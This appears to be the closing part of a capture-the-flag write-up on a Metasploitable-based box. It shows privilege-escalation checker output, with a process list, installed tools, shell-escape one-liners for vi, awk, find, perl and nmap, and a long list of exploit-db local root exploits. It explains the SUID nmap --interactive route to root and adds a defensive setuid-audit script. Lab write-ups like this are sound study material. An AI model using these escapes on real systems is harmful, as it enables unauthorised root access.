             cron 3.0pl1-100ubuntu2  of regular background processing
    root 9847 08:14 0:00 sleep
    root 5136 Sep10 0:00 /usr/bin/jsvc
        Possible Related Packages: 
             jsvc 1.0.2~svn20061127-6  to launch Java applications as daemo
    root 3992 Sep10 0:00 [kjournald]
    root 4924 Sep10 0:00 [nfsd]
    root 4250 Sep10 0:00 /usr/sbin/rpc.idmapd
    root 4484 Sep10 0:00 /sbin/getty
    root 4487 Sep10 0:00 /sbin/getty
    root 2683 Sep10 0:00 /sbin/udevd
    root 2 Sep10 0:00 [kthreadd]
    root 4920 Sep10 0:00 [nfsd]
    root 5209 Sep10 0:00 xterm
        Possible Related Packages: 
             xterm 229-1ubuntu1.1  terminal emulator
    root 4923 Sep10 0:00 [nfsd]
    root 1439 Sep10 0:00 [ata_aux]
    root 5028 Sep10 0:00 /usr/sbin/xinetd
        Possible Related Packages: 
             xinetd 1:2.3.14-5  for inetd with many enhancements
    root 1452 Sep10 0:00 [scsi_eh_1]
    root 225 Sep10 0:00 [aio/0]
    root 4925 Sep10 0:00 [nfsd]
    root 5197 Sep10 0:00 /sbin/getty
    root 182 Sep10 0:00 [pdflush]
    root 5183 Sep10 0:31 ruby
        Possible Related Packages: 
             libruby1.8 1.8.6.111-2ubuntu1.3  necessary to run Ruby 1.8
             ruby 4.1  interpreter of object-oriented scripting
             ruby1.8 1.8.6.111-2ubuntu1.3  of object-oriented scripting lan
    root 184 Sep10 0:00 [kswapd0]
    root 4921 Sep10 0:00 [nfsd]
    root 1245 Sep10 0:00 [ksnapd]
    root 9850 08:14 0:00 sh
    root 1 Sep10 0:01 /sbin/init
        Possible Related Packages: 
             busybox-initramfs 1:1.1.3-5ubuntu12  shell setup for initramfs
             initramfs-tools 0.85eubuntu36  for generating an initramfs
             initscripts 2.86.ds1-14.1ubuntu45  for initializing and shutting down t
             libklibc 1.5.7-4ubuntu3  libc subset for use with initramfs
             lsb-base 3.2-4ubuntu1  Standard Base 3.2 init script function
             module-init-tools 3.3-pre11-4ubuntu5  for managing Linux kernel modules
             upstart 0.3.9-2  init daemon
             upstart-compat-sysv 0.3.9-2  for System-V-like init
             xinit 1.0.7-2  server initialisation tool
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/ruby
    /usr/bin/gcc
    /usr/bin/cc
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/nmap
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget
    /usr/bin/ftp
[+] Related Shell Escape Sequences...
    nmap-->	--interactive
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    vi-->	:!bash
    vi-->	:set shell=/bin/bash:shell
    awk-->	awk 'BEGIN {system("/bin/bash")}'
    find-->	find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->	perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c
    - < 2.6.29 exit_notify() Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8369 || Language=c
    - 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation || https://www.exploit-db.com/exploits/9844 || Language=python
    - < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit || https://www.exploit-db.com/exploits/14814 || Language=c
    - 2.x sock_sendpage() Local Root Exploit 2 || https://www.exploit-db.com/exploits/9436 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c
    - 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver) || https://www.exploit-db.com/exploits/9479 || Language=c
    - 2.6 UDEV < 141 Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8572 || Language=c
    - 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit || https://www.exploit-db.com/exploits/5092 || Language=c
    - Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit || https://www.exploit-db.com/exploits/9083 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit [2] || https://www.exploit-db.com/exploits/9598 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c
    - Linux RDS Protocol Local Privilege Escalation || https://www.exploit-db.com/exploits/15285 || Language=c
    - 2.6.x ptrace_attach Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8673 || Language=c
    - 2.x sock_sendpage() Local Ring0 Root Exploit || https://www.exploit-db.com/exploits/9435 || Language=c
    - Test Kernel Local Root Exploit 0day || https://www.exploit-db.com/exploits/9191 || Language=c
    - 2.4/2.6 bluez Local Root Privilege Escalation Exploit (update) || https://www.exploit-db.com/exploits/926 || Language=c
    - CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c
    - 2.4/2.6 sock_sendpage() Local Root Exploit (ppc) || https://www.exploit-db.com/exploits/9545 || Language=c
    - 2.6 UDEV Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/8478 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
    - < 2.6.36.2 Econet Privilege Escalation Exploit || https://www.exploit-db.com/exploits/17787 || Language=c
    - Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby
    - < 2.6.37-rc2 ACPI custom_method Privilege Escalation || https://www.exploit-db.com/exploits/15774 || Language=c
    - 'pipe.c' Local Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/10018 || Language=sh
    - 2.4/2.6 sock_sendpage() Local Root Exploit [3] || https://www.exploit-db.com/exploits/9641 || Language=c
    - <= 2.6.37 Local Privilege Escalation || https://www.exploit-db.com/exploits/15704 || Language=c
    - 2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/895 || Language=c
Finished
=================================================================================================
daemon@lame:/tmp/PrivescTools$ 

Given that the box appears to be based on Metasploitable, there’s lots in there. One possible vector is the classic SUID attack on nmap.

Older versions of nmap (2.02 to 5.21) have an --interactive option which allows you to issue shell commands using the “!” character, e.g. !ls. And if nmap has the SUID bit set then it’s running as root even when run by a non-privileged user:

The sequence above shows: first check the version: yes, it’s old enough. Then get into the interactive mode with the --interactive switch. Then, instead of issuing individual commands, let’s try spawning a shell with !sh and then testing it. https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/ covers this with some other privesc tricks. This is an attack I’ve only ever read about as an example of the risk of SUID, so it was nice to actually use it for once.
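The defender's side of the SUID nmap finding, as an added example (not from the original post or from the privchecker script): it walks a directory tree, reports every setuid file, and raises the severity for binaries that the scan output lists under "Related Shell Escape Sequences". The function names, the sample tree and the sample version strings are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Binaries the scan output above lists under "Related Shell Escape Sequences".
SHELL_ESCAPE_BINARIES = {"nmap", "vi", "vim", "awk", "find", "perl"}

# The post gives 2.02 to 5.21 as the nmap versions with --interactive.
NMAP_INTERACTIVE_RANGE = ((2, 2), (5, 21))


def nmap_has_interactive(version_text):
    """True if the version string falls in the range the post gives.

    Assumes nmap's usual MAJOR.MINOR numbering with a two-digit minor
    (4.53, 5.21, 7.80), so a (major, minor) tuple comparison is valid.
    """
    match = re.search(r"(\d+)\.(\d+)", version_text)
    if match is None:
        return False
    version = (int(match.group(1)), int(match.group(2)))
    low, high = NMAP_INTERACTIVE_RANGE
    return low <= version <= high


def audit_setuid(root):
    """Walk `root` and return one finding per regular file with the setuid bit."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                info = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if not stat.S_ISREG(info.st_mode):
                continue
            if not info.st_mode & stat.S_ISUID:
                continue
            escapable = name in SHELL_ESCAPE_BINARIES
            any_user = bool(info.st_mode & stat.S_IXOTH)
            findings.append({
                "path": path,
                "owner_uid": info.st_uid,
                # On a real host, root ownership (uid 0) is what makes a
                # setuid shell escape a root shell; reported for triage.
                "root_owned": info.st_uid == 0,
                "mode": stat.filemode(info.st_mode),
                "shell_escape": escapable,
                "severity": "high" if escapable and any_user else "review",
                "fix": "chmod u-s " + path,
            })
    return findings


def build_sample_tree(root):
    """Create a constructed bin directory: two setuid files, two ordinary ones."""
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755),
                       ("vi", 0o755), ("find", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as handle:
            handle.write("#!/bin/sh\n")  # placeholder content, never executed
        os.chmod(path, mode)  # set the mode after writing; writes clear setuid
    return bindir


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as sample_root:
        build_sample_tree(sample_root)
        for finding in audit_setuid(sample_root):
            print("{severity:6} {mode} uid={owner_uid} {path}".format(**finding))
            print("       suggested: " + finding["fix"])
    # Constructed version string, not the version found on the box.
    print("4.53 in --interactive range:",
          nmap_has_interactive("Nmap version 4.53"))
```

Pointed at `/` on a real host, the `high` findings are the ones to strip the setuid bit from or remove first; `review` findings such as `passwd` are usually legitimate but worth checking against the distribution's package manifest.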

There are other privesc routes on here given it’s Metasploitable. The udev exploit is being flagged up by the privchecker app. I tried it and it worked fine, but I’m not sure it’s really worth detailing here.
